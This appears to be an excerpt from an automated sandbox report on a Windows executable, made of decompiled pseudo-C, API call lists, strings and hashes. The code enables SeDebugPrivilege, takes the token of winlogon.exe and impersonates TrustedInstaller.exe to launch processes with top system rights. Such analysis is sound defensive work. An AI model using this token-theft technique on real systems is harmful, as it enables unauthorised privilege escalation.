															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
                                                                                                                					_v20 =  &_v1316;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                				char _v0;
                                                                                                                				WCHAR* _v4;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t76;
                                                                                                                				void* _t82;
                                                                                                                				wchar_t* _t85;
                                                                                                                				void* _t86;
                                                                                                                				void* _t87;
                                                                                                                				intOrPtr _t92;
                                                                                                                				wchar_t* _t93;
                                                                                                                				intOrPtr _t95;
                                                                                                                				int _t106;
                                                                                                                				char* _t110;
                                                                                                                				intOrPtr _t115;
                                                                                                                				wchar_t* _t117;
                                                                                                                				intOrPtr _t124;
                                                                                                                				wchar_t* _t125;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int _t156;
                                                                                                                				void* _t159;
                                                                                                                				intOrPtr _t162;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t181;
                                                                                                                				int _t187;
                                                                                                                				intOrPtr _t188;
                                                                                                                				intOrPtr _t190;
                                                                                                                				intOrPtr _t198;
                                                                                                                				signed int _t205;
                                                                                                                				signed int _t206;
                                                                                                                
                                                                                                                				_t179 = __edx;
                                                                                                                				_t158 = __ecx;
                                                                                                                				_t206 = _t205 & 0xfffffff8;
                                                                                                                				E0040B550(0x1ccc, __ecx);
                                                                                                                				_t76 = E0040313D(_t158);
                                                                                                                				if(_t76 != 0) {
                                                                                                                					E0040AC52();
                                                                                                                					SetErrorMode(0x8001); // executed
                                                                                                                					_t156 = 0;
                                                                                                                					 *0x40fa70 = 0x11223344;
                                                                                                                					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                					_t82 = E00405497( &_a8);
                                                                                                                					_a48 = 0x20;
                                                                                                                					_a40 = 0;
                                                                                                                					_a52 = 0;
                                                                                                                					_a44 = 0;
                                                                                                                					_a56 = 0;
                                                                                                                					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                                                					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                					 *_t206 = L"/SpecialRun";
                                                                                                                					_t85 = E0040585C( &_v0);
                                                                                                                					__eflags = _t85;
                                                                                                                					if(_t85 != 0) {
                                                                                                                						L8:
                                                                                                                						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                						__eflags = _t86 - _t156;
                                                                                                                						if(_t86 < _t156) {
                                                                                                                							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                							__eflags = _t87 - _t156;
                                                                                                                							if(_t87 >= _t156) {
                                                                                                                								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t41 = _t87 + 1; // 0x1
                                                                                                                								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                								__eflags = _t117;
                                                                                                                								if(_t117 == 0) {
                                                                                                                									_a92 = _t156;
                                                                                                                									memset( &_a94, _t156, 0x208);
                                                                                                                									_a620 = _t156;
                                                                                                                									memset( &_a622, _t156, 0x208);
                                                                                                                									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t125 = _t124 + 0x5504;
                                                                                                                									_v4 = _t125;
                                                                                                                									_t187 = wcslen(_t125);
                                                                                                                									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                									__eflags = _t187 + _t51 - 0x104;
                                                                                                                									if(_t187 + _t51 >= 0x104) {
                                                                                                                										_a620 = _t156;
                                                                                                                									} else {
                                                                                                                										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                									}
                                                                                                                									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t132 = _t131 + 0x5504;
                                                                                                                									__eflags = _t132;
                                                                                                                									wcscpy(_t132,  &_a620);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E00402F31(_t156);
                                                                                                                							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                							_pop(_t159);
                                                                                                                							_a84 =  &_a8;
                                                                                                                							_a76 = 0x40cb0c;
                                                                                                                							_a88 = _t156;
                                                                                                                							_a80 = _t156;
                                                                                                                							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                								__eflags = _t93;
                                                                                                                								if(_t93 < 0) {
                                                                                                                									E00406420();
                                                                                                                									__imp__CoInitialize(_t156);
                                                                                                                									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                									E00402F31(1);
                                                                                                                									__imp__CoUninitialize();
                                                                                                                								} else {
                                                                                                                									E004065BE(_t159);
                                                                                                                								}
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                								_a7356 = _t156;
                                                                                                                								_a7352 = _t156;
                                                                                                                								_a7340 = _t156;
                                                                                                                								_a7344 = _t156;
                                                                                                                								_a7348 = _t156;
                                                                                                                								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                								_t110 =  &_a5288;
                                                                                                                								L6:
                                                                                                                								E004035FB(_t110);
                                                                                                                								L7:
                                                                                                                								E004054B9( &_v0);
                                                                                                                								E004099D4( &_a32);
                                                                                                                								E004054B9( &_v0);
                                                                                                                								_t106 = _t156;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = _t86 + 1; // 0x1
                                                                                                                						_t173 = _t26;
                                                                                                                						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							E00402F31(_t156);
                                                                                                                						} else {
                                                                                                                							E00402FC6(_t173, __eflags, _t138);
                                                                                                                						}
                                                                                                                						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a68 =  &_a8;
                                                                                                                						_a60 = 0x40cb0c;
                                                                                                                						_a72 = _t156;
                                                                                                                						_a64 = _t156;
                                                                                                                						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a5280 = _t156;
                                                                                                                						_a5276 = _t156;
                                                                                                                						_a5264 = _t156;
                                                                                                                						_a5268 = _t156;
                                                                                                                						_a5272 = _t156;
                                                                                                                						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                						_t110 =  &_a3212;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					__eflags = _a56 - 3;
                                                                                                                					if(_a56 != 3) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags = 1;
                                                                                                                					_a3212 = 0;
                                                                                                                					_a3208 = 0;
                                                                                                                					_a3196 = 0;
                                                                                                                					_a3200 = 0;
                                                                                                                					_a3204 = 0;
                                                                                                                					_v4 = 0;
                                                                                                                					_v0 = 0;
                                                                                                                					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                					_t177 = 2;
                                                                                                                					_push(E0040584C( &_v0, _t177));
                                                                                                                					L0040B1F8();
                                                                                                                					_pop(_t178);
                                                                                                                					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                                                					_t110 =  &_a1132;
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t106 = _t76 + 1;
                                                                                                                					L2:
                                                                                                                					return _t106;
                                                                                                                				}
                                                                                                                			}





































                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                				int _v8;
                                                                                                                				long _v12;
                                                                                                                				wchar_t* _v16;
                                                                                                                				void _v546;
                                                                                                                				long _v548;
                                                                                                                				void _v1074;
                                                                                                                				char _v1076;
                                                                                                                				void* __esi;
                                                                                                                				long _t84;
                                                                                                                				int _t87;
                                                                                                                				wchar_t* _t88;
                                                                                                                				int _t92;
                                                                                                                				void* _t93;
                                                                                                                				int _t94;
                                                                                                                				int _t96;
                                                                                                                				int _t99;
                                                                                                                				int _t104;
                                                                                                                				long _t105;
                                                                                                                				int _t110;
                                                                                                                				void** _t112;
                                                                                                                				int _t113;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int* _t148;
                                                                                                                				wchar_t* _t149;
                                                                                                                				int _t151;
                                                                                                                				void* _t152;
                                                                                                                				void* _t153;
                                                                                                                				int _t154;
                                                                                                                				void* _t155;
                                                                                                                				long _t160;
                                                                                                                
                                                                                                                				_t145 = __edx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                				_v12 = 0;
                                                                                                                				if(_t131 != 4) {
                                                                                                                					__eflags = _t131 - 5;
                                                                                                                					if(_t131 != 5) {
                                                                                                                						__eflags = _t131 - 9;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = _t131 - 8;
                                                                                                                							if(_t131 != 8) {
                                                                                                                								__eflags = _t131 - 6;
                                                                                                                								if(_t131 != 6) {
                                                                                                                									__eflags = _t131 - 7;
                                                                                                                									if(_t131 != 7) {
                                                                                                                										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									} else {
                                                                                                                										_t132 = __eax + 0x46b6;
                                                                                                                										_t148 = __eax + 0x48b6;
                                                                                                                										__eflags =  *_t148;
                                                                                                                										_v16 = _t132;
                                                                                                                										_v8 = __eax + 0x4ab6;
                                                                                                                										if( *_t148 == 0) {
                                                                                                                											_t88 = wcschr(_t132, 0x40);
                                                                                                                											__eflags = _t88;
                                                                                                                											if(_t88 != 0) {
                                                                                                                												_t148 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t153 = _t152 + 0x800;
                                                                                                                										E0040289F(_t153);
                                                                                                                										_t154 =  *(_t153 + 0xc);
                                                                                                                										__eflags = _t154;
                                                                                                                										if(_t154 == 0) {
                                                                                                                											_t87 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                										}
                                                                                                                										__eflags = _t87;
                                                                                                                									}
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t84 = GetLastError();
                                                                                                                										L43:
                                                                                                                										_v12 = _t84;
                                                                                                                									}
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                								__eflags = _t92;
                                                                                                                								if(_t92 != 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t84 = _a28;
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                							__eflags = _t93;
                                                                                                                							if(_t93 != 0) {
                                                                                                                								E00401306(_t93); // executed
                                                                                                                							}
                                                                                                                							_v8 = 0;
                                                                                                                							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                							__eflags = _t94;
                                                                                                                							_v12 = _t94;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                								__eflags = _t96;
                                                                                                                								_v12 = _t96;
                                                                                                                								if(_t96 == 0) {
                                                                                                                									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									__eflags = _t99;
                                                                                                                									if(_t99 == 0) {
                                                                                                                										_v12 = GetLastError();
                                                                                                                									}
                                                                                                                									CloseHandle(_v8); // executed
                                                                                                                								}
                                                                                                                								RevertToSelf(); // executed
                                                                                                                							}
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                						__eflags = _t104;
                                                                                                                						if(_t104 == 0) {
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_v8 = 0;
                                                                                                                						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t149 = __eax + 0x44ac;
                                                                                                                					_t110 = wcslen(_t149);
                                                                                                                					__eflags = _t110;
                                                                                                                					if(_t110 <= 0) {
                                                                                                                						goto L44;
                                                                                                                					} else {
                                                                                                                						_v8 = 0;
                                                                                                                						__eflags = E00404EA9(_t149, _t110);
                                                                                                                						_t112 =  &_v8;
                                                                                                                						_push(_t112);
                                                                                                                						_push(_t149);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                						} else {
                                                                                                                							L0040B1F8();
                                                                                                                							_push(_t112);
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401E44();
                                                                                                                						}
                                                                                                                						_v12 = _t113;
                                                                                                                						__eflags = _t113;
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v548 = 0;
                                                                                                                					memset( &_v546, 0, 0x208);
                                                                                                                					_v1076 = 0;
                                                                                                                					memset( &_v1074, 0, 0x208);
                                                                                                                					E00404C3C( &_v548);
                                                                                                                					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                					_t151 = wcslen(??);
                                                                                                                					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                					_t159 = _t151 + _t10 - 0x104;
                                                                                                                					if(_t151 + _t10 >= 0x104) {
                                                                                                                						_v1076 = 0;
                                                                                                                					} else {
                                                                                                                						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                					}
                                                                                                                					_v8 = 0;
                                                                                                                					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                					L14:
                                                                                                                					_t160 = _t105;
                                                                                                                					_v12 = _t105;
                                                                                                                					L15:
                                                                                                                					if(_t160 == 0) {
                                                                                                                						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                							_v12 = GetLastError();
                                                                                                                						}
                                                                                                                						CloseHandle(_v8);
                                                                                                                					}
                                                                                                                					L44:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                			}


































                                                                                                                0x004020de
                                                                                                                0x004020df
                                                                                                                0x004020df
                                                                                                                0x004020ec
                                                                                                                0x004020ef
                                                                                                                0x00000000
                                                                                                                0x004020ef
                                                                                                                0x00402008
                                                                                                                0x00402016
                                                                                                                0x0040201d
                                                                                                                0x0040202e
                                                                                                                0x00402035
                                                                                                                0x00402044
                                                                                                                0x00402049
                                                                                                                0x00402055
                                                                                                                0x00402064
                                                                                                                0x00402068
                                                                                                                0x0040206e
                                                                                                                0x0040208b
                                                                                                                0x00402070
                                                                                                                0x00402082
                                                                                                                0x00402088
                                                                                                                0x0040209e
                                                                                                                0x004020a1
                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                				void* _t6;
                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                                				CHAR* _t13;
                                                                                                                				intOrPtr* _t17;
                                                                                                                
                                                                                                                				if( *__esi == 0) {
                                                                                                                					_t7 = E00405436(L"psapi.dll"); // executed
